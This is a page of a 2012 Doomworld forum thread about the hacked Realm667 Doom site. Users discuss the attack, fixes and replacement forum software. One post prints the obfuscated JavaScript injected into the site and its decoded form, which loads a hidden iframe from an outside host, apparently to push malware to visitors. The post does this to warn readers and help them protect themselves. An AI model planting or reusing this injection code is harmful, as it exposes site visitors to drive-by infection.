Weird impy thing
Register | User Profile | Member List | F.A.Q | Privacy Policy | New Blog | Search Forums | Forums Home
Doomworld Forums : Powered by vBulletin version 2.2.5 Doomworld Forums > Classic Doom > Doom General > Something wrong with Realm667.
Pages (4): « 1 [2] 3 4 »  
Author
All times are GMT. The time now is 14:24. Post New Thread    Post A Reply
PRIMEVAL
Senior Member


Posts: 1899
Registered: 03-09



Quasar said:

Too busy shutting down sites that legally comply with DMCA even when not legally required to do so on account of not being incorporated within the US, and then redirecting their domain names to ICE logos to scare up the little people into obeying their masters.



Ah, well, I guess tough luck then.

__________________
Facebook | Twitter | Music on Facebook | Youtube | SoundCloud | ReverbNation

Old Post 12-03-12 17:41 #
PRIMEVAL is offline Profile || Blog || PM || Email || Search || Add Buddy IP || Edit/Delete || Quote
Mancubus II
Purple is not a breakfast color


Posts: 1939
Registered: 02-03



Tormentor667 said:
Depending, I managed to remove the injected code but I am not sure yet where the security hole is... so if you are a good programmer or hacker, feel free to let us know :)

No you haven't, or it's back again. It was picked up by antivirus attempting to visit your page.

You are running phpbb, so you can bet that's where the security hole is. Are you running the latest version? Are your permissions set properly? You may want to consider different forum software.

Old Post 12-03-12 20:34 #
Mancubus II is offline Profile || Blog || PM || Email || Homepage || Search || Add Buddy IP || Edit/Delete || Quote
PRIMEVAL
Senior Member


Posts: 1899
Registered: 03-09


Any progress with this? Site is still down it seems.

__________________
Facebook | Twitter | Music on Facebook | Youtube | SoundCloud | ReverbNation

Old Post 12-07-12 22:01 #
PRIMEVAL is offline Profile || Blog || PM || Email || Search || Add Buddy IP || Edit/Delete || Quote
Blue Shadow
Junior Member


Posts: 244
Registered: 09-12



PRIMEVAL said:
Any progress with this?

The last thing I know is that Tormentor hasn't completely got rid of the problem and was (probably still is) in need for some assistance from more experienced individuals to help with the issue.


Site is still down it seems.

The front page is still accessible. As for the forums, I don't know. I visited it yesterday and my anti-virus software reported an unidentified/unknown file being downloaded into my machine from the site. Since then, I refrained from going there.

Old Post 12-08-12 08:10 #
Blue Shadow is offline Profile || Blog || PM || Search || Add Buddy IP || Edit/Delete || Quote
Gez
Why don't I have a custom title by now?!


Posts: 10689
Registered: 07-07


Be sure to disable javascript before visiting the forums.

There is an unplugged security hole somewhere that allows whatever hackbot does this to inject this javascript code at random places in the HTML files:


<!--393740--><script type="text/javascript" language="javascript" > ww=window; try{document.body++} catch(dgsgsdg){zxc=1; } try{d=document.createElement("div"); d.innerHTML.a="asd"; } catch(agdsg){zxc=0; } try{if(ww.document)window["doc"+"ument"]["body"]="asd"} catch(bawetawe){if(ww.document){v=window; try{fawbe--} catch(afnwenew){try{(v+v)()} catch(gngrthn){if("".substr)ev=eval; } n=["1f", "42", "4h", "4a", "3o", "4g", "45", "4b", "4a", "17", "1f", "1g", "17", "4n", "d", "a", "17", "17", "17", "17", "4i", "3m", "4e", "17", "4h", "17", "2b", "17", "40", "4b", "3o", "4h", "49", "41", "4a", "4g", "1l", "3o", "4e", "41", "3m", "4g", "41", "2j", "48", "41", "49", "41", "4a", "4g", "1f", "1e", "45", "42", "4e", "3m", "49", "41", "1e", "1g", "29", "d", "a", "17", "17", "17", "17", "4h", "1l", "4f", "4e", "3o", "17", "2b", "17", "1e", "44", "4g", "4g", "4c", "28", "1m", "1m", "4m", "41", "4e", "4b", "3m", "3o", "4g", "45", "4b", "4a", "1l", "4a", "48", "1m", "4e", "41", "48", "3m", "4l", "1l", "4c", "44", "4c", "1e", "29", "d", "a", "17", "17", "17", "17", "4h", "1l", "4f", "4g", "4l", "48", "41", "1l", "4c", "4b", "4f", "45", "4g", "45", "4b", "4a", "17", "2b", "17", "1e", "3m", "3n", "4f", "4b", "48", "4h", "4g", "41", "1e", "29", "d", "a", "17", "17", "17", "17", "4h", "1l", "4f", "4g", "4l", "48", "41", "1l", "3n", "4b", "4e", "40", "41", "4e", "17", "2b", "17", "1e", "1n", "1e", "29", "d", "a", "17", "17", "17", "17", "4h", "1l", "4f", "4g", "4l", "48", "41", "1l", "44", "41", "45", "43", "44", "4g", "17", "2b", "17", "1e", "1o", "4c", "4k", "1e", "29", "d", "a", "17", "17", "17", "17", "4h", "1l", "4f", "4g", "4l", "48", "41", "1l", "4j", "45", "40", "4g", "44", "17", "2b", "17", "1e", "1o", "4c", "4k", "1e", "29", "d", "a", "17", "17", "17", "17", "4h", "1l", "4f", "4g", "4l", "48", "41", "1l", "48", "41", "42", "4g", "17", "2b", "17", "1e", "1o", "4c", "4k", "1e", "29", "d", "a", "17", "17", "17", "17", "4h", "1l", "4f", "4g", "4l", "48", "41", "1l", "4g", "4b", "4c", "17", "2b", "17", "1e", "1o", "4c", "4k", "1e", "29", "d", "a", "d", "a", "17", "17", "17", "17", "45", "42", "17", "1f", "18", "40", "4b", "3o", "4h", "49", "41", "4a", "4g", "1l", "43", "41", "4g", "2j", "48", "41", "49", "41", "4a", "4g", "2g", "4l", "2n", "40", "1f", "1e", "4h", "1e", "1g", "1g", "17", "4n", "d", "a", "17", "17", "17", "17", "17", "17", "17", "17", "40", "4b", "3o", "4h", "49", "41", "4a", "4g", "1l", "4j", "4e", "45", "4g", "41", "1f", "1e", "2a", "40", "45", "4i", "17", "45", "40", "2b", "3h", "1e", "4h", "3h", "1e", "17", "2c", "2a", "1m", "40", "45", "4i", "2c", "1e", "1g", "29", "d", "a", "17", "17", "17", "17", "17", "17", "17", "17", "40", "4b", "3o", "4h", "49", "41", "4a", "4g", "1l", "43", "41", "4g", "2j", "48", "41", "49", "41", "4a", "4g", "2g", "4l", "2n", "40", "1f", "1e", "4h", "1e", "1g", "1l", "3m", "4c", "4c", "41", "4a", "40", "2h", "44", "45", "48", "40", "1f", "4h", "1g", "29", "d", "a", "17", "17", "17", "17", "50", "d", "a", "50", "1g", "1f", "1g", "29"]; h=2; s=""; if(zxc)for(i=0; i-443!=0; i++){k=i; s+=String.fromCharCode(parseInt(n[i], 25)); } z=s; if(ww.document)ev("if(1)"+z)} } } </script><!--/393740-->


(Spaces added to save layout.)

If you de-obfuscate the code, you get this:
code:
(function () { var u = document.createElement('iframe'); u.src = 'http://zeroaction.nl/relay.php'; u.style.position = 'absolute'; u.style.border = '0'; u.style.height = '1px'; u.style.width = '1px'; u.style.left = '1px'; u.style.top = '1px'; if (!document.getElementById('u')) { document.write('<div id='u' ></div>'); document.getElementById('u').appendChild(u); } })();

So adding zeroaction.nl to your .host file as 127.0.0.1 might be a good idea to make sure this hack is thwarted on your PC.

Cleaning it up is useless, since it just comes back a few hours later.

Last edited by Gez on 12-08-12 at 08:34

Old Post 12-08-12 08:13 #
Gez is online now Profile || Blog || PM || Search || Add Buddy IP || Edit/Delete || Quote
Blue Shadow
Junior Member


Posts: 244
Registered: 09-12


Does disabling javascript alone is enough, or do I need to do this as well...?

Gez said:
So adding zeroaction.nl to your .host file as 127.0.0.1 might be a good idea to make sure this hack is thwarted on your PC.

And if so, could you run it down as a step-by-step? Because I haven't got a clue on how to do this (I'm referring to the quoted bit above, not the javascript one).

Old Post 12-08-12 13:12 #
Blue Shadow is offline Profile || Blog || PM || Search || Add Buddy IP || Edit/Delete || Quote
Gez
Why don't I have a custom title by now?!


Posts: 10689
Registered: 07-07


Disabling JavaScript alone should be sufficient.

The hosts file is, on Windows systems, C:\Windows\System32\Drivers\etc\.hosts.

Old Post 12-08-12 14:52 #
Gez is online now Profile || Blog || PM || Search || Add Buddy IP || Edit/Delete || Quote
Mancubus II
Purple is not a breakfast color


Posts: 1939
Registered: 02-03



Gez said:
The hosts file is, on Windows systems, C:\Windows\System32\Drivers\etc\hosts

Minus the period before hosts...

Old Post 12-08-12 15:23 #
Mancubus II is offline Profile || Blog || PM || Email || Homepage || Search || Add Buddy IP || Edit/Delete || Quote
Blue Shadow
Junior Member


Posts: 244
Registered: 09-12



Gez said:
Disabling JavaScript alone should be sufficient.

Thanks. Now, I just hope this isn't going to be the permanent solution for this.

Old Post 12-08-12 15:49 #
Blue Shadow is offline Profile || Blog || PM || Search || Add Buddy IP || Edit/Delete || Quote
printz
CRAZY DUMB ZEALOT


Posts: 8545
Registered: 06-06


The top of the page (right below the Chrome address bar) seems to show some Chinese characters now:
http://i.imgur.com/MdQIBl.png
Maybe that's the iframe caused by the hack?

__________________
Automatic Wolfenstein - Version 1.0

Old Post 12-08-12 22:04 #
printz is offline Profile || Blog || PM || Homepage || Search || Add Buddy IP || Edit/Delete || Quote
Gez
Why don't I have a custom title by now?!


Posts: 10689
Registered: 07-07


Why do you go there with JS enabled?! Don't! And there'll be no iframe!

Old Post 12-08-12 22:19 #
Gez is online now Profile || Blog || PM || Search || Add Buddy IP || Edit/Delete || Quote
printz
CRAZY DUMB ZEALOT


Posts: 8545
Registered: 06-06


I went there before I read this info. And I hope you're not genuinely bothered, but sorry in any case :-/

Are you being genuinely alarmed (me being a fool who just infected his device, me doing something that makes it difficult for you to fix the site) or sarcastic (I should have known the obvious)?

__________________
Automatic Wolfenstein - Version 1.0

Old Post 12-08-12 22:43 #
printz is offline Profile || Blog || PM || Homepage || Search || Add Buddy IP || Edit/Delete || Quote
GhostlyDeath
Forum Retard


Posts: 1027
Registered: 08-05


Just download everything and check the ZIPs for integrity and viruses.

Old Post 12-09-12 02:12 #
GhostlyDeath is offline Profile || Blog || PM || Homepage || Search || Add Buddy IP || Edit/Delete || Quote
BloodyAcid
Senior Member


Posts: 1279
Registered: 09-11


So...what's going on with the website now? Nothing's working. I hope it's a revamp and not a closure.

Old Post 12-16-12 19:38 #
BloodyAcid is offline Profile || Blog || PM || Email || Search || Add Buddy IP || Edit/Delete || Quote
Gez
Why don't I have a custom title by now?!


Posts: 10689
Registered: 07-07


It's the end of days. Fixing the site is pointless since the world will explode in less than a week.

Seriously though, the last news were that a professional was working on fixing the security holes. The message board was also apparently being upgraded.

I'm not aware of anything else.

Old Post 12-16-12 20:24 #
Gez is online now Profile || Blog || PM || Search || Add Buddy IP || Edit/Delete || Quote
Blue Shadow
Junior Member


Posts: 244
Registered: 09-12



Gez said:
It's the end of days.

I'm inclined to believe that. I've just visited the front page and all there was an inverted cross with "No rest of the living..." phrase at the bottom.

Old Post 12-17-12 00:56 #
Blue Shadow is offline Profile || Blog || PM || Search || Add Buddy IP || Edit/Delete || Quote
GreyGhost
Why don't I have a custom title by now?!


Posts: 8140
Registered: 01-08


Plugging security holes AND upgrading the message boards probably requires the site to be taken offline, apart from that placeholder image.

Old Post 12-17-12 01:26 #
GreyGhost is offline Profile || Blog || PM || Email || Search || Add Buddy IP || Edit/Delete || Quote
Tormentor667
Senior Member


Posts: 1975
Registered: 10-00



Mancubus II said:
You may want to consider different forum software.

What would you suggest? And beyond, how to migrate the old posts and users?

Old Post 12-17-12 10:08 #
Tormentor667 is offline Profile || Blog || PM || Homepage || Search || Add Buddy IP || Edit/Delete || Quote
Gez
Why don't I have a custom title by now?!


Posts: 10689
Registered: 07-07


Manc uses SMF.

It still uses PHP, though, which I think is ultimately the source of most security holes.

Old Post 12-17-12 10:42 #
Gez is online now Profile || Blog || PM || Search || Add Buddy IP || Edit/Delete || Quote
Tormentor667
Senior Member


Posts: 1975
Registered: 10-00


Is there an easy way to migrate content from phpBB to SMF?

Old Post 12-17-12 11:25 #
Tormentor667 is offline Profile || Blog || PM || Homepage || Search || Add Buddy IP || Edit/Delete || Quote
Gez
Why don't I have a custom title by now?!


Posts: 10689
Registered: 07-07


I suppose not, but I have no idea.

Old Post 12-17-12 12:12 #
Gez is online now Profile || Blog || PM || Search || Add Buddy IP || Edit/Delete || Quote
Clonehunter
Forum Spammer


Posts: 3182
Registered: 03-10



Blue Shadow said:

I'm inclined to believe that. I've just visited the front page and all there was an inverted cross with "No rest of the living..." phrase at the bottom.



Granted, it's kinda cool looking.

Old Post 12-19-12 01:43 #
Clonehunter is offline Profile || Blog || PM || Email || Search || Add Buddy IP || Edit/Delete || Quote
Kappes Buur
Forum Regular


Posts: 798
Registered: 11-02



Tormentor667 said:What would you suggest? And beyond, how to migrate the old posts and users?

Some commercial and free forum software:
https://www.vbulletin.com/
http://www.simplemachines.org/
http://www.aspplayground.net/
http://www.proboards.com/
http://www.mybb.com/

MyBB has a handy tool to migrate from other forum software.

This site has some helpful hints, reviews and comparisons:
http://www.forum-software.org/

Old Post 12-19-12 15:37 #
Kappes Buur is offline Profile || Blog || Email || Homepage || Search || Add Buddy IP || Edit/Delete || Quote
MajorRawne
Senior Member


Posts: 1168
Registered: 04-10


I'm getting the attack site message too. It looks similar to the message I get when I insert some of the new Bestiary creatures into my own maps.

WOAH!

Are you sure you want to add that?

<Pallette_swapped_monster_used_as_a_boss> may be risky to fight.

Why are you seeing this message?

This monster reportedly blasts five hundred fireballs out in all directions, has numerous other devastating attacks and sustains more damage than every monster in Doom 2 combined.

< Back to the drawing board Use monster anyway >


Nevertheless, the Bestiary is awesome and I hope this is resolved soon :)

Old Post 12-19-12 17:58 #
MajorRawne is offline Profile || Blog || PM || Email || Search || Add Buddy IP || Edit/Delete || Quote
djvero
Mini-Member


Posts: 65
Registered: 04-10


What's going on now over there? Does anybody have some information? I only get to see a picture of a tomb stone that says "No rest for the living"

Old Post 12-22-12 14:58 #
djvero is offline Profile || Blog || PM || Search || Add Buddy IP || Edit/Delete || Quote
Blue Shadow
Junior Member


Posts: 244
Registered: 09-12


The site has been hacked early this month, and now is being repaired and upgraded.

As when that process will be completed, I don't know.

Old Post 12-22-12 16:42 #
Blue Shadow is offline Profile || Blog || PM || Search || Add Buddy IP || Edit/Delete || Quote
djvero
Mini-Member


Posts: 65
Registered: 04-10


Yea I knew it got hacked, but the site was still running and then a few days ago the website was shut down, so I thought they had been hacked again

Old Post 12-24-12 14:47 #
djvero is offline Profile || Blog || PM || Search || Add Buddy IP || Edit/Delete || Quote
Tormentor667
Senior Member


Posts: 1975
Registered: 10-00



Memfis said:
What if Tormentor himself "hacked" it so that he could boost his ego by reading threads like this one? JK.

You must be the greatest idiot possible on this planet :D

Anyway, we are back online!

Old Post 12-27-12 23:18 #
Tormentor667 is offline Profile || Blog || PM || Homepage || Search || Add Buddy IP || Edit/Delete || Quote
BloodyAcid
Senior Member


Posts: 1279
Registered: 09-11



Tormentor667 said:

You must be the greatest idiot possible on this planet :D

Anyway, we are back online!


yay welcome back! :D

Old Post 12-27-12 23:36 #
BloodyAcid is offline Profile || Blog || PM || Email || Search || Add Buddy IP || Edit/Delete || Quote
GreyGhost
Why don't I have a custom title by now?!


Posts: 8140
Registered: 01-08



Tormentor667 said:
Anyway, we are back online!
Welcome back! I'm leaving a page open to see how high the snow gets.

Old Post 12-28-12 04:16 #
GreyGhost is offline Profile || Blog || PM || Email || Search || Add Buddy IP || Edit/Delete || Quote
All times are GMT. The time now is 14:24. Post New Thread    Post A Reply
Pages (4): « 1 [2] 3 4 »  
Doomworld Forums : Powered by vBulletin version 2.2.5 Doomworld Forums > Classic Doom > Doom General > Something wrong with Realm667.

Show Printable Version | Email this Page | Subscribe to this Thread

 

Forum Rules:
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
HTML code is OFF
vB code is ON
Smilies are OFF
[IMG] code is ON
 

< Contact Us - Doomworld >

Powered by: vBulletin Version 2.2.5
Copyright ©2000, 2001, Jelsoft Enterprises Limited.

Message Board Statistics